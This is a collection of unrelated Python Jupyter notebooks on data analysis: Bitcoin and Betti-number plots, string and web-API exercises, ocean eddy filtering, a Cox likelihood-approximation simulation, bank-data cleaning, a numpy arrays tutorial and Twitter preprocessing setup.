check_output("C:/Users/wang.yuhao/Documents/CoinWorks-master/perseus_4_beta/perseus.exe distmat ./dailyAmoMatrices/amo2017001.csv ./random_regression", shell=True) input_path = 
"C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/OccChainletsInTime.txt" def read_csv(file_path): total_tx = pd.read_csv(file_path, sep="\t") print(total_tx.head()) data_2017_all = total_tx[total_tx['year']==2017] print(data_2017_all) data_2017_total_tx = data_2017_all.loc[:, ['day', 'totaltx']] print(data_2017_total_tx) data_2017_total_tx = data_2017_total_tx['totaltx'].reset_index(drop=True) print(data_2017_total_tx) data_2017_total_tx = data_2017_total_tx.plot.line(figsize=(20,4)) data_2017_total_tx.figure.savefig('data_2017_total_tx.jpg') read_csv(input_path) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/pricedBitcoin2009-2018.csv" def read_csv(file_path): total_tx = pd.read_csv(file_path) print(total_tx.head()) data_2017_all = total_tx[total_tx['year']==2017] print(data_2017_all) data_2017_total_tx = data_2017_all.loc[:, ['price']].reset_index(drop=True) data_2017_total_tx_log = [] print(data_2017_total_tx) for i in range(1, 365): log_return = np.log(data_2017_total_tx.loc[i,'price']/data_2017_total_tx.loc[i-1,'price']) data_2017_total_tx_log.append(log_return) data_2017_total_tx_log = pd.DataFrame(data_2017_total_tx_log) data_2017_total_tx_log = data_2017_total_tx_log.plot.line(figsize=(20,4)) data_2017_total_tx_log.figure.savefig('data_2017_total_tx_log.jpg') read_csv(input_path) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/betti_0(100).csv" def read_csv(file_path): betti_0 = pd.read_csv(file_path, index_col=0) print(betti_0.head()) betti_0 = betti_0.mean(axis=1) print(betti_0) betti_0 = betti_0.plot.line(figsize=(20,4)) betti_0.figure.savefig('betti_0.jpg') read_csv(input_path) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/betti_1(100).csv" def read_csv(file_path): betti_1 = pd.read_csv(file_path, index_col=0) print(betti_1.head()) betti_1 = betti_1.mean(axis=1) print(betti_1) betti_1 = betti_1.plot.line(figsize=(20,4)) betti_1.figure.savefig('betti_1.jpg') 
read_csv(input_path) ```
github_jupyter
# Exercise Set 3: Strings, requests and APIs *Morning, August 14, 2018* In this exercise set you will be working with collecting from the web. We will start out with some basic string operations and build on that to make a query for fetching data. In addition to DataCamp, you might find [this page](https://pythonprogramming.net/string-concatenation-formatting-intermediate-python-tutorial/) on pythonprogramming.net useful. [This page](https://www.python-course.eu/python3_sequential_data_types.php) give an introduction to the basics of strings and their related data types. ## Exercise Section 3.1: Basic string operations and dictionaries Strings have multiple operations and functions associated. In this exercise we investigate a few of these. We also explore the sequence form of a string and how it can be sliced and accessed via indices. > **Ex. 3.1.1**: Let `s1='Chameleon'` and `s2='ham'`. Check whether the string `s2` is a substring of `s1`. Is `'hello'` a substring `'goodbye'`? > *Hint*: One string operation is to check whether a string `S` contains a substring `T`, this can be done with the `in` operator: `S in T`. ``` # [Answer to Ex. 3.1.1] s1 = 'Chameleon' s2 = 'ham' if s2 in s1: print("ham is a substring of Chameleon... See? C-ham-eleon") ``` > **Ex. 3.1.2**: From the string `s1` select the last four characters. What is the index of the character `a` in `s1`? > *Hint*: We can selecting a substring by slicing it with the `[]` notation, from the start to end where start is included and end is excluded. Recall that Python has zero-based indexing, see explanation [here](https://softwareengineering.stackexchange.com/questions/110804/why-are-zero-based-arrays-the-norm). ``` # [Answer to Ex. 
3.1.2] last_four = s1[-4:] print("The last four characters are '{l}', the 'a' sits at index {a}, since Python is 0-indexed".format(l= last_four, a = s1.find('a'))) ``` In addition to the techniques above strings are equipped with an array of _methods_, for solving more complex tasks. For example the `str.join(list)` method will insert a string in between each element of a list. Oppositely `str1.split(str2)` splits `str1` into a list. `.strip()` removes spaces in the beginning and end of a word and `.format()` fills in specified blanks in a string. Below we illustrate the use of each function ```python >>> ','.join(['a','b']) 'a,b' >>> ' Hello World! '.strip() 'Hello World!' >>> 'Hello {w}'.format(w='World!') 'Hello World!' >>> 'a,b,c'.split(',') ['a','b','c'] ``` > **Ex. 3.1.3:** Let `l1 = ['r ', 'Is', '>', ' < ', 'g ', '?']`. Create from `l1` the sentence "Is r > g?" using your knowledge about string formatting. Make sure there is only one space in between worlds. > >> _Hint:_ You should be able to combine the above informations to solve this exercise. ``` # [Answer to Ex. 3.1.3] # Will be in assignment 1 ``` ### Dictionaries Dictionaries (or simply dicts) are a central building block of python. Python dicts are constructed from pairs of keys and values making them extremely versatile for data storage. Furthermore dicts correspond directly to the json file format. > **Ex. 3.1.4**: Create an empty dictionary `words` using the `dict()`function. Then add each of the words in `['animal', 'coffee', 'python', 'unit', 'knowledge', 'tread', 'arise']` as a key, with the value being a boolean indicator for whether the word begins with a vowel. The results should look like `{'bacon': False, 'asynchronous': True ...}` > >> _Hint:_ You might want co first construct a function that asseses whether a given word begins with a vowel or not. ``` # [Answer to Ex. 3.1.4] # Will be in assignment 1 ``` > **Ex. 3.1.5:** Loop through the dictionary `words`. 
In each iteration you should print a proper sentence stating if the current word begins with a vowel or not. > _Hint:_ You can loop through both keys and values simultaneously with the `.items()` method. [This](https://www.tutorialspoint.com/python/python_dictionary.htm) might help you. ``` # [Answer to Ex. 3.1.5] for w,b in words.items(): if b: print('{word} begins with a vowel'.format(word = w)) else: print('{word} does not begin with a vowel'.format(word = w)) ``` <br> ## Exercise Section 3.2: The punk API The [punk API](https://punkapi.com/) serves information about _beers_. It is a well made and well documented API which makes it great for learning about APIs. > **Ex. 3.2.1:** Read the documentation on the Punk API available [here](https://punkapi.com/documentation/v2). What is the server url (i.e. root endpoint) of the Punk API? Does it require authentication? Then use the Punk API to make a request for beers brewed before December, 2008 with an ABV of at least 8. ``` # [Answer to Ex. 3.2.1] # Server URL is 'https://api.punkapi.com/v2/' # No authentication required import requests response = requests.get('https://api.punkapi.com/v2/beers?brewed_before=12-2008&abv_gt=8') ``` > **Ex. 3.2.2:** What object type is the API's JSON response? What about the individual items in the container? Convert the response object to a suitable format and answer the following questions: >> 1) How many beers are in the JSON object? >> >> 2) Print the names of the beers in the JSON object using lower case characters. >> >> 3) Select the beer called Paradox Islay from the JSON object. >> >> 4) Which hop ingredients does the Paradox Islay contain? ``` # [Answer to Ex. 3.2.2] # format is json (see documentation) beers = response.json() # 1) How many beers are in the JSON object? len(beers) # 2) Print the names of the beers in the JSON object using lower case characters. 
print('Beer names:', [b['name'].lower() for b in beers]) # 3) Select the beer called Paradox Islay from the JSON object. print('Paradox Islay is the 2nd entry, i.e. index 1.') b = beers[1] # 4) Which hop ingredients does the Paradox Islay contain? print('Ingredients in Paradox Islay:', set(i['name'] for i in b['ingredients']['hops'])) ``` > **Ex. 3.2.3:** Save the beers as a JSON file on your machine. > _Hint:_ you might want to take a look at the [json](https://docs.python.org/3/library/json.html) module. ``` # [Answer to Ex. 3.2.3] import json with open('beers.json', 'w') as f: f.write(json.dumps(beers)) ``` <br> ## Exercise Section 3.3: The DST API DST (Statistics Denmark) provide an API access to their aggregate data. For developers they supply a [console](https://api.statbank.dk/console) for testing. In this exercise we will first code up a simple script which can collect data from the DST API, and then introduce the [PyDST](https://kristianuruplarsen.github.io/PyDST/) package. > **Ex 3.3.1:** Use the API console to construct a GET request which retrieves the table FOLK1A split by quarter. The return should be in JSON format. We want all available dates. > >Then write a function `construct_link()` which takes as inputs: a table ID (e.g. `'FOLK1A'`) and a list of strings like `['var1=*', 'var2=somevalue']`. The function should return the proper URL for getting a dataset with the specified variables (e.g. in this case all levels of var1, but only where var2=somevalue). > _Hint:_ The time variable is called 'tid'. To select all available values, set the value-id to '*'. Spend a little time with the console to get a sense of how the URLs are constructed. ``` # [Answer to Ex. 
3.3.1] # This is the manually constructed link 'https://api.statbank.dk/v1/data/FOLK1A/JSONSTAT?lang=en&Tid=*' # This function will do it for you def construct_link(table_id, variables): base = 'https://api.statbank.dk/v1/data/{id}/JSONSTAT?lang=en'.format(id = table_id) for var in variables: base += '&{v}'.format(v = var) return base construct_link('FOLK1A', ['Tid=*']) ``` When executing the request in the console you should get a json file as output. Next lets write some code to load these json files directly into python. > **Ex. 3.3.2:** use the `requests` module (get it with `pip install requests`) and `construct_link()` to request birth data from the "FOD" table. Get all available years (variable "Tid"), but only female births (BARNKON=P) . Unpack the json payload and store the result. Wrap the whole thing in a function which takes an url as input and returns the corresponding output. > _Hint:_ The `requests.response` object has a `.json()` method. ``` # [Answer to Ex. 3.3.2] # Will be in assignment 1 ``` > **Ex. 3.3.3:** Extract the number of girls born each year. Store the results as a list. ``` # [Answer to Ex. 3.3.3] girls = data['value'] ``` > ** Ex.3.3.4:** Repeat 3.3.2 and 3.3.3 but this time only get boy births (BARNKON=D). Store the numbers in a new list and use the `plot_births` (supplied below) function to plot the data. If you don't already have matplotlib installed run `pip install matplotlib`. ``` # Just run this once, do not change it. import matplotlib.pyplot as plt def plot_births(boys, girls): """ Plots lineplot of the number of births split by gender. 
Args: boys: a list of boy births by year girls: a list of girl births by year """ if not len(boys) == len(girls): raise ValueError('There must be the same number of observations for boys and girls') labels = ['{y}'.format(y=year) for year in range(1973,2018)] plt.plot(range(len(boys)), boys, color = 'blue', label = 'boys') plt.plot(range(len(boys)), girls, color = 'red', label = 'girls') plt.xticks([i for i in range(len(boys)) if i%4 == 0], [l for i,l in zip(range(len(boys)),labels) if i%4 == 0], rotation = 'vertical') plt.legend() plt.show() # [Answer to Ex. 3.3.4] s2 = construct_link('FOD', ['Tid=*', 'BARNKON=D']) boys = send_GET_request(s2)['value'] plot_births(boys, girls) ``` >**(Bonus question) Ex. 3.3.5:** Go to [https://kristianuruplarsen.github.io/PyDST/](https://kristianuruplarsen.github.io/PyDST/) follow the installation instructions and import PyDST. Try to replicate the birth figure from 3.3.4 using PyDST. Use [the documentation](https://kristianuruplarsen.github.io/PyDST/connection) to learn how the package works. > _Hint:_ PyDST does not use json or dicts as its primary data format, instead it uses pandas DataFrames. When you install PyDST it will install pandas as a dependency. If this doesn't work simply run `pip install pandas` in your console. DataFrames are very intuitive to work with, for example accessing a column named 'name' is simply `data['name']` or `data.name`. > > In the next session you will learn more about pandas and DataFrames. If you are more comfortable with dicts, the data_response class has a `.dict` method you can use. ``` # [Answer to Ex. 3.3.5] import PyDST import seaborn as sns; sns.set_style("whitegrid") conn = PyDST.connection(language = 'en') resp = conn.get_data('FOD', variables = ['Tid', 'BARNKON'], values = {'Tid': ['*'], 'BARNKON': ['*']} ) data = resp.df sns.lineplot('TID', 'INDHOLD', data = data, hue = 'BARNKON', markers=True, palette = ['blue', 'red']) ```
github_jupyter
``` # Importing all libraries. from pylab import * from netCDF4 import Dataset %matplotlib inline import os import cmocean as cm from trackeddy.tracking import * from trackeddy.datastruct import * from trackeddy.geometryfunc import * from trackeddy.init import * from trackeddy.physics import * from trackeddy.plotfunc import * import xarray as xr sla_file='/g/data3/hh5/tmp/akm157/mom01v5_kds75/output306/rregionsouthern_ocean_daily_eta_t.nc' mdt_file='/home/156/jm5970/github/trackeddy/data.input/meanssh_10yrs_AEXP.nc' dataset_mdt = Dataset(mdt_file,'r') lat_mdt = dataset_mdt.variables['Latitude'][:] lon_mdt = dataset_mdt.variables['Longitude'][:] mdt = dataset_mdt.variables['SSH_mean'][:,:,:] dataset_adt = Dataset(sla_file,'r') eta = dataset_adt.variables['eta_t'][:,:,:] sla = eta - mdt/100 time = dataset_adt.variables['time'][:] lat = dataset_adt.variables['yt_ocean_sub01'][:] lon = dataset_adt.variables['xt_ocean_sub01'][:] pcolormesh(lon,lat,sla[0,:,:]) colorbar() def circle(x,y,r): theta = linspace(0,2*np.pi,100) x_0 = r * cos(theta) +x y_0 = r * sin(theta) +y return x_0,y_0 def maskoutcontour(x_0,y_0,r,lon,lat,field,fillval=False): maskfield=np.zeros(np.shape(field)) #print(shape(field)) xin=find(lon,x_0-r) xfn=find(lon,x_0+r) yin=find(lat,y_0-r) yfn=find(lat,y_0+r) for ii in range(xin,xfn): for jj in range(yin,yfn): dist = np.sqrt((x_0 - lon[ii]) ** 2 + (y_0 - lat[jj]) ** 2) if dist <= r and shape(maskfield)[0]==len(lat): maskfield[jj,ii]=True elif dist <= r and shape(maskfield)[0]==len(lon): maskfield[ii,jj]=True maskfield[maskfield==0]=False msla = np.ma.masked_where(maskfield==False, field) pcolormesh(msla) show() return msla def maskoutcontour(x_0,y_0,r,lon,lat,field,fillval=False): maskfield=np.zeros(np.shape(field)) #print(shape(field)) for ii in range(0,len(lon)): for jj in range(0,len(lat)): dist = np.sqrt((x_0 - lon[ii]) ** 2 + (y_0 - lat[jj]) ** 2) if dist <= r and shape(maskfield)[0]==len(lat): maskfield[jj,ii]=True elif dist <= r and 
shape(maskfield)[0]==len(lon): maskfield[ii,jj]=True maskfield[maskfield==0]=False if fillval==False: msla = np.ma.masked_where(maskfield==fillval, field) #pcolormesh(field) #show() else: field[maskfield==False]=fillval msla=field #pcolormesh(maskfield) #show() return msla lat_cir=-50 lon_cir=-100 x_circle,y_circle=circle(lon_cir,lat_cir,3) mfield=maskoutcontour(lon_cir,lat_cir,3,lon,lat,sla[0,:,:]) print(shape(mfield)) pcolormesh(lon,lat,sla[0,:,:]) colorbar() pcolormesh(lon,lat,mfield) plot(x_circle,y_circle) radius=3 mask={} ii=1000 blank=ones(shape(sla)) xin=find(lon,lon[ii]-radius) xfn=find(lon,lon[ii]+radius) for jj in range(0,len(lat)): yin=find(lat,lat[jj]-radius) yfn=find(lat,lat[jj]+radius) mask[str(lat[jj])]= maskoutcontour(lon[ii],lat[jj],radius,lon[xin:xfn],lat[yin:yfn],blank[0,yin:yfn,xin:xfn]) #print(shape(mask[str(lat[jj])]),lat[jj]) sla[sla==sla[0,0,0]]=np.nan import time meanfiltered=zeros(shape(sla)) for tt in range(0,1): for ii in range(0,len(lon)): print(ii) init=time.clock() for jj in range(0,len(lat)): xin=find(lon,lon[ii]-radius) xfn=find(lon,lon[ii]+radius) yin=find(lat,lat[jj]-radius) yfn=find(lat,lat[jj]+radius) #print(ii<=find(lon,lon[0]+radius)) if ii < find(lon,lon[0]+radius): xinf=find(lon,lon[ii]-radius+360)-len(lon) data=hstack((sla[tt,yin:yfn,xinf:],sla[tt,yin:yfn,:xfn])) elif ii>find(lon,lon[len(lon)-1]-radius): xinf=find(lon,lon[ii]+radius-360) # print(xinf) data=hstack((sla[tt,yin:yfn,xin:],sla[tt,yin:yfn,:xinf])) # print(shape(data)) else: data=sla[tt,yin:yfn,xin:xfn] #print(lat[jj],shape(mask[str(lat[jj])])) if np.ma.is_masked(sla[tt,jj,ii])!=True or abs(sla[tt,jj,ii]) > 1000 : #print(np.shape(sla[tt,yin:yfn,xin:xfn]),shape(mask[str(lat[jj])])) #pcolormesh(mask[str(lat[jj])]) #show() #pcolormesh(mask[str(lat[jj])]) #colorbar() #show() mfield=data*mask[str(lat[jj])] #pcolormesh(mfield) #colorbar() #show() #mfield=maskoutcontour(lon[ii],lat[jj],3,lon[xin:xfn],lat[yin:yfn],sla[tt,yin:yfn,xin:xfn]) 
meanfiltered[tt,jj,ii]=nanmean(mfield) else: meanfiltered[tt,jj,ii]=np.nan print('Time Ellapsed:',time.clock()-init) print(0.75*len(lon)/60) pcolormesh(lon,lat,meanfiltered[0,:,:]) colorbar() pcolormesh(lon,lat,sla[0,:,:]) colorbar() show() pcolormesh(lon,lat,sla[0,:,:]-meanfiltered[0,:,:]) colorbar() show() slaa=xr.open_dataset(sla_file) x0=-100 y0=-50 l=3 import time meanfiltered=zeros(shape(sla)) for tt in range(0,1): for ii in range(0,len(lon)): x0=lon[ii] start = time.time() print(x0) for jj in range(0,len(lat)): y0=lat[jj] if np.ma.is_masked(sla[tt,jj,ii])!=True: mfield=slaa.eta_t[tt ,:,:].sel(xt_ocean_sub01=slice(x0-l, x0+l))\ .sel(yt_ocean_sub01=slice(y0-l,y0+l)).mean() meanfiltered[tt,jj,ii]=mfield.values #print(mfield.values) else: meanfiltered[tt,jj,ii]=np.nan end = time.time() print(end - start) pcolormesh(lon,lat,sla[0,:,:]-meanfiltered[0,:,:]) colorbar() def plot_spectrum(im_fft): from matplotlib.colors import LogNorm # A logarithmic colormap plt.imshow(np.abs(im_fft), norm=LogNorm()) plt.colorbar() from scipy import fftpack fft = fftpack.fft2(sla[0,:,:]) plt.figure() plot_spectrum(fft) plt.title('Fourier transform') # In the lines following, we'll make a copy of the original spectrum and # truncate coefficients. # Define the fraction of coefficients (in each direction) we keep keep_fraction = 0.02 # Call ff a copy of the original transform. Numpy arrays have a copy # method for this purpose. fft2 = fft.copy() # Set r and c to be the number of rows and columns of the array. 
r, c = fft2.shape # Set to zero all rows with indices between r*keep_fraction and # r*(1-keep_fraction): fft2[int(r*keep_fraction):int(r*(1-keep_fraction))] = 0 # Similarly with the columns: fft2[:, int(c*keep_fraction):int(c*(1-keep_fraction))] = 0 plt.figure() plot_spectrum(fft2) plt.title('Filtered Spectrum') sla_new = fftpack.ifft2(fft2).real pcolormesh(lon,lat,sla_new)#,vmin=-100,vmax=100) colorbar() from scipy import ndimage blur = ndimage.gaussian_filter(sla,4) pcolormesh(lon,lat,blur[0,:,:]) ```
github_jupyter
# Replication - Likelihood Approximation: Additional 1 (Large P) - Table Here we provide a notebook to replicate the simulation results for the likelihood approximations. These are additional simualtions to evaluate the impact of the number of covariates P on the approximation. This produced the table from the supplement. The notebook replicates the results in: - /out/simulation/tables/likelihood_approx_MPE_additional1.csv - /out/simulation/tables/likelihood_approx_MAPE_additional1.csv The main script can be found at: - /scripts/simulation/tables/likelihood_approx_additional1.py ``` # google colab specific - installing probcox !pip3 install probcox # Modules # ======================================================================================================================= import os import sys import shutil import subprocess import tqdm import numpy as np import pandas as pd import torch from torch.distributions import constraints import pyro import pyro.distributions as dist from pyro.infer import SVI, Trace_ELBO import matplotlib.pyplot as plt import warnings warnings.filterwarnings("ignore") import probcox as pcox dtype = torch.FloatTensor np.random.seed(90834) torch.manual_seed(873645) # Custom function for evaluation # ======================================================================================================================= # run the approximation 1000 times for a given setting and return MPE/MAPE def run(surv, pred, batch, est): total_obs = surv.shape[0] total_events = torch.sum(surv[:, -1] == 1).numpy().tolist() sampling_proportion = [total_obs, batch, total_events, None] ll = [] ll2 = [] while len(ll) <=1000: idx = np.unique(np.concatenate((np.random.choice(np.where(surv[:, -1]==1)[0], 2, replace=False), np.random.choice(range(surv.shape[0]), batch-2, replace=False)))) sampling_proportion[-1] = torch.sum(surv[idx, -1]).numpy().tolist() if torch.sum(surv[idx, -1]) > 1: e = pcox.CoxPartialLikelihood(pred=pred[idx], 
sampling_proportion=sampling_proportion).log_prob(surv=surv[idx]).detach().numpy() MPE = ((e-est)/est) MAPE = np.abs(MPE) ll.append(MPE.tolist()) ll2.append(MAPE.tolist()) return(np.mean(ll), np.mean(ll2)) # Simulation Settings # ======================================================================================================================= I = [10000] # individuals P = [500, 1000] # covariates C = [0.5, 0.75, 0.95, 0.99] # censorship B = [64, 128, 256, 512] # batch size # Simulation # ======================================================================================================================= res = np.zeros((8, 4)) res2 = np.zeros((8, 4)) sim_n =[] ii = 0 jj = 0 for p in P: # make baselinehazard cond = True scale = 100 while cond: theta = np.random.normal(0, 0.01, (p, 1)) TVC = pcox.TVC(theta=theta, P_binary=int(p/2), P_continuous=int(p/2), dtype=dtype) TVC.make_lambda0(scale=scale) s = np.sum([torch.sum(TVC.sample()[0][:, -1]).numpy() for ii in (range(1000))])/1000 if np.logical_and(s>=0.1, s<=0.9): cond = False scale = scale/5 theta_ = torch.normal(0, 0.01, (p, 1)).type(dtype) for i in I: for c in C: # make dataset print('s') surv, X = TVC.make_dataset(obs=i, fraction_censored=c) sim_n.append('I(N): ' + str(i) + '(' + str(surv.shape[0]) + ')' +', P: ' + str(p) + ', C: ' + str(c)) pred = torch.mm(X, theta_).type(dtype) est = pcox.CoxPartialLikelihood(pred=pred, sampling_proportion=None).log_prob(surv=surv).detach().numpy() # fit to batch for b in tqdm.tqdm(B): res[ii, jj], res2[ii, jj] = run(surv=surv, pred=pred, batch=b, est=est) jj += 1 ii += 1 jj = 0 res = np.round(res, 2) res2 = np.round(res2, 2) MPE = pd.DataFrame(np.concatenate((np.asarray(sim_n)[:, None], res.astype(str)), axis=1)) MAPE = pd.DataFrame(np.concatenate((np.asarray(sim_n)[:, None], res2.astype(str)), axis=1)) MPE MAPE ```
github_jupyter
# Exercise 2 ## Cleaning the data Now we have the data downloaded. We can will have to clean the data so that it is appropriate for training. ``` %matplotlib inline import pandas as pd bank_data = pd.read_csv('data/bank_data_feats.csv', index_col=0) bank_data.head(n=20) ``` Numerical columns - age - balance - day - duration - campaign - pdays - previous Binary columns - default - housing - loan Categorical columns to convert to dummy dummy columns - job - education - marital - contact - month - poutcome We can use the `describe` function to examine some properties of the numerical columns ``` bank_data.describe() ``` We can also look at the distribution of numerical values ``` import matplotlib.pyplot as plt %matplotlib inline bank_data.hist() ``` ### Converting non-numercal columns to numerical #### Binary columns Convert 'default' column to binary, rename to 'is_default' ``` bank_data['default'].value_counts() bank_data['default'].value_counts().plot(kind='bar') ``` We can see that this column is highly skewed, which makes sense, since according to the documentstion (data/bank-names.txt) this column indicates whether the customer has any credit in default. ``` bank_data['is_default'] = bank_data['default'].apply(lambda row: 1 if row == 'yes' else 0) ``` Let's look at the two columns side-by-side to get an understanding ``` bank_data[['default', 'is_default']].tail() ``` Do the same for housing, confirming that there are only two options, yes, and no ``` bank_data['housing'].value_counts() bank_data['housing'].value_counts().plot(kind='bar') bank_data['is_housing'] = bank_data['housing'].apply(lambda row: 1 if row == 'yes' else 0) ``` Repeat for loan ``` bank_data['loan'].value_counts() bank_data['loan'].value_counts().plot(kind='bar') bank_data['is_loan'] = bank_data['loan'].apply(lambda row: 1 if row == 'yes' else 0) ``` ### Categorical columns The other columns are categorical so we will have to deal with them a little differently. 
``` bank_data['marital'].value_counts() bank_data['marital'].value_counts().plot(kind='bar') ``` We can see that there are three options for the marital column, so we will make this a categorical column. We can do this using the `get_dummies` function in the pandas library ``` help(pd.get_dummies) marital_dummies = pd.get_dummies(bank_data['marital']) pd.concat([bank_data['marital'], marital_dummies], axis=1).head(n=10) ``` We can see that there is a bit of redundant information here, we have three total options, but we know that whenever two of the columns are zero, the other column HAS to be 1, since everyone has to fall into one of the three options. We can then drop one of the columns and assume that a zero in the remaining columns means that the dropped column is true. Here we will drop the `divorced` column and change the name of the remaining columns from `married` to `is_married` and from `single` to `is_single` for consistency and clarity. ``` marital_dummies.drop('divorced', axis=1, inplace=True) marital_dummies.columns = [f'marital_{colname}' for colname in marital_dummies.columns] marital_dummies.head() ``` Now we will join it back to the original dataset ``` bank_data = pd.concat([bank_data, marital_dummies], axis=1) ``` Let's do the same for the `job`, `education`, and `contact` ``` bank_data['job'].value_counts() bank_data['job'].value_counts().plot(kind='bar') ``` The `unknown` value seems most appropriate to drop here ``` job_dummies = pd.get_dummies(bank_data['job']) job_dummies.drop('unknown', axis=1, inplace=True) ``` Let's also rename the columns so we know they came from the job field ``` job_dummies.columns = [f'job_{colname}' for colname in job_dummies.columns] bank_data = pd.concat([bank_data, job_dummies], axis=1) bank_data['education'].value_counts() bank_data['education'].value_counts().plot(kind='bar') edu_dummies = pd.get_dummies(bank_data['education']) edu_dummies.drop('unknown', axis=1, inplace=True) edu_dummies.columns = 
[f'education_{colname}' for colname in edu_dummies.columns] bank_data = pd.concat([bank_data, edu_dummies], axis=1) ``` And for the contact field ``` bank_data['contact'].value_counts() bank_data['contact'].value_counts().plot(kind='bar') contact_dummies = pd.get_dummies(bank_data['contact']) contact_dummies.drop('unknown', axis=1, inplace=True) contact_dummies.columns = [f'contact_{colname}' for colname in contact_dummies.columns] bank_data = pd.concat([bank_data, contact_dummies], axis=1) ``` For the `month` field we may want to do something a bit different because there is an inherent order to the months. In this case we may want to label the months in the chronological order. To do this we can create a map to represent the months as numbers and preserve the ordinality. ``` month_map = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec': 12} bank_data['month'].value_counts() bank_data['month'].value_counts().plot(kind='bar') ``` Whoa! The month is highly skewed, I wonder why there are so many entries in May? ``` bank_data['month'] = bank_data['month'].map(month_map) ``` And finally we'll do the same thing for the `poutcome` column, the resultas from the previous campaign. ``` bank_data['poutcome'].value_counts() bank_data['poutcome'].value_counts().plot(kind='bar') poutcome_dummies = pd.get_dummies(bank_data['poutcome']) poutcome_dummies.drop('unknown', axis=1, inplace=True) poutcome_dummies.columns = [f'poutcome_{colname}' for colname in poutcome_dummies.columns] bank_data = pd.concat([bank_data, poutcome_dummies], axis=1) bank_data.iloc[0] bank_data.drop(['job', 'education', 'marital', 'default', 'housing', 'loan', 'contact', 'poutcome'], axis=1, inplace=True, errors='ignore') ``` Let's check the data types to confirm that that the are all numerical ``` bank_data.dtypes ``` While the data may not be the most appropriate form to train a model, we can techincally train the model with it. 
Later on in the lesson we will tackle some more appropriate methods to represent the variables that will result in better model performance. We will save the models to csv files ``` bank_data.to_csv('data/bank_data_feats_a2.csv') ``` #### Target variable We can do a similar task to the target variable by making all the columns into numerical data types. We start by loading it in. ``` target = pd.read_csv('data/bank_data_target.csv', index_col=0) target.head(n=10) ``` This one should be easy since there's just one column, let's verify that there are only two options. ``` target['y'].value_counts() target['y'].value_counts().plot(kind='bar') target['y'] = target['y'].apply(lambda row: 1 if row=='yes' else 0) target.head(n=10) target.to_csv('data/bank_data_target_e2.csv') ```
github_jupyter
# Arrays While there are many kinds of collections in Python, we will work primarily with arrays in this class. The `numpy` package, abbreviated `np` in programs, provides Python programmers with convenient and powerful functions for creating and manipulating arrays. ``` import numpy as np ``` Arrays often contain numbers, but the can also contain strings or other types of values. However, a single array can only contain a single kind of data. (It usually doesn't make sense to group together unlike data anyway.) For example: ``` english_parts_of_speech = np.array(["noun", "pronoun", "verb", "adverb", "adjective", "conjunction", "preposition", "interjection"]) english_parts_of_speech ``` Returning to the temperature data, we create arrays of average daily [high temperatures](http://berkeleyearth.lbl.gov/auto/Regional/TMAX/Text/global-land-TMAX-Trend.txt) for the decades surrounding 1850, 1900, 1950, and 2000. ``` baseline_high = 14.48 highs = np.array([baseline_high - 0.880, baseline_high - 0.093, baseline_high + 0.105, baseline_high + 0.684]) highs ``` Arrays can be used in arithmetic expressions to compute over their contents. When an array is combined with a single number, that number is combined with each element of the array. Therefore, we can convert all of these temperatures to Fahrenheit by writing the familiar conversion formula. ``` (9/5) * highs + 32 ``` <img src="{{ site.baseurl }}/images/array_arithmetic.png"> Arrays also have *methods*, which are functions that operate on the array values. The `mean` of a collection of numbers is its average value: the sum divided by the length. Each pair of parentheses in the examples below is part of a call expression; it's calling a function with no arguments to perform a computation on the array called `highs`. ``` highs.size highs.sum() highs.mean() ``` #### Functions on Arrays Numpy provides various useful functions for operating on arrays. 
For example, the `diff` function computes the difference between each adjacent pair of elements in an array. The first element of the `diff` is the second element minus the first. ``` np.diff(highs) ``` The [full Numpy reference](http://docs.scipy.org/doc/numpy/reference/) lists these functions exhaustively, but only a small subset are used commonly for data processing applications. These are grouped into different packages within `np`. Learning this vocabulary is an important part of learning the Python language, so refer back to this list often as you work through examples and problems. However, you **don't need to memorize these**. Use this as a reference. Each of these functions takes an array as an argument and returns a single value. | **Function** | Description | |--------------------|----------------------------------------------------------------------| | `np.prod` | Multiply all elements together | | `np.sum` | Add all elements together | | `np.all` | Test whether all elements are true values (non-zero numbers are true)| | `np.any` | Test whether any elements are true values (non-zero numbers are true)| | `np.count_nonzero` | Count the number of non-zero elements | Each of these functions takes an array as an argument and returns an array of values. | **Function** | Description | |--------------------|----------------------------------------------------------------------| | `np.diff` | Difference between adjacent elements | | `np.round` | Round each number to the nearest integer (whole number) | | `np.cumprod` | A cumulative product: for each element, multiply all elements so far | | `np.cumsum` | A cumulative sum: for each element, add all elements so far | | `np.exp` | Exponentiate each element | | `np.log` | Take the natural logarithm of each element | | `np.sqrt` | Take the square root of each element | | `np.sort` | Sort the elements | Each of these functions takes an array of strings and returns an array. 
| **Function** | **Description** | |---------------------|--------------------------------------------------------------| | `np.char.lower` | Lowercase each element | | `np.char.upper` | Uppercase each element | | `np.char.strip` | Remove spaces at the beginning or end of each element | | `np.char.isalpha` | Whether each element is only letters (no numbers or symbols) | | `np.char.isnumeric` | Whether each element is only numeric (no letters) Each of these functions takes both an array of strings and a *search string*; each returns an array. | **Function** | **Description** | |----------------------|----------------------------------------------------------------------------------| | `np.char.count` | Count the number of times a search string appears among the elements of an array | | `np.char.find` | The position within each element that a search string is found first | | `np.char.rfind` | The position within each element that a search string is found last | | `np.char.startswith` | Whether each element starts with the search string {% data8page Arrays %}
github_jupyter
In this notebook we will be using the smtd_preprocessing.py file which is a preprocessing pipeline for twitter data to pre-process our tweets and then train our own twitter embeddings. <br> We can also find pre-trained Twitter embeddings, but here we will train our own. ``` import os import sys import pandas as pd from gensim.models import Word2Vec import warnings warnings.filterwarnings('ignore') from nltk.tokenize import TweetTokenizer tweet_tokenizer = TweetTokenizer() PATH = "path to repo" # sys.path entries must be directories, not .py files: append the folder # that contains the preprocessing module, then import it under the short # alias used throughout the rest of this notebook. preprocessing_dir = PATH+"/practical-nlp/Ch8" sys.path.append(os.path.abspath(preprocessing_dir)) import O5_smtd_preprocessing as smtd_preprocessing ``` Let's use the dir() function to find all the properties and methods in the package. ``` dir(smtd_preprocessing) ``` ## Read Data Let's read the data. Normally in csv files the values are separated by a ','.<br> In this case, it is separated by a ';' so we will specify the delimiter as ';'. ``` datapath = "/home/etherealenvy/github/practical-nlp/Ch8/Data/sts_gold_tweet.csv" df = pd.read_csv(datapath,error_bad_lines=False,delimiter=";") #let's have a look at the dataset df.head() 